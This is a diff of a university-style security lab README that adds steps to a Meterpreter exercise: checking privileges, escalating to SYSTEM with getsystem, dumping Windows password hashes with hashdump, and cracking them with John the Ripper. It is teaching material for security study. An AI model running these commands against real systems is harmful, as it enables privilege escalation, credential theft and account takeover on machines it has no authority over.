ufidon/sec/labs/lab07/README.md

     1. (10%) Dump the hash values of all saved passwords of all windows users, then crack with John the Ripper.
     ```bash
     # Inside meterpreter
+    # 1. Check the priviledge that meterpreter is currently in
+    getuid
+    # 2. Escalate priviledge
+    use priv
+    getsystem
+    getuid
-    # 1. dump the hashes
+    # 3. dump the hashes
     hashdump # save the result in a text file
-    # 2. crack the hashes
+    # 4. crack the hashes
     john --wordlist=pass_dict.txt --format=NT hashes.txt
     ```
     2. (10%) Change Windows users' password.
 Use a user found above, replace oldpass and newpass with yours